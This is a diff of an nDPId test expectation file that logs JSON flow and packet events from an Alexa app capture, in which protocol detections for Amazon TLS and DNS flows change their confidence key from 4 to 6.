00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1490976041770,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976041770,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWlRAAEARM0qsECrYrBAqAVOPADUAQZgzlqMBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1490976041806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041806,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlVAAEARM2KsECrYrBAqActtADUAKHKAa+oBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1490976041866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976041866,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0nZAAEARuxesECoBrBAq2AA1U48AUSKClqOBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAOQAENu8Yug=="} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} +00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1490976041938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976041938,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90nlAAEARurysECoBrBAq2AA1y20AqYS4a+qBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABMAAoDd3d3A2NkbsAQwCwABQABAAAA+AAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAgABDRV0djAQgABAAEAAAAIAAQ0VdHFwEIAAQABAAAACAAENFXRj8BCAAEAAQAAAAgABDRV0Xo="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 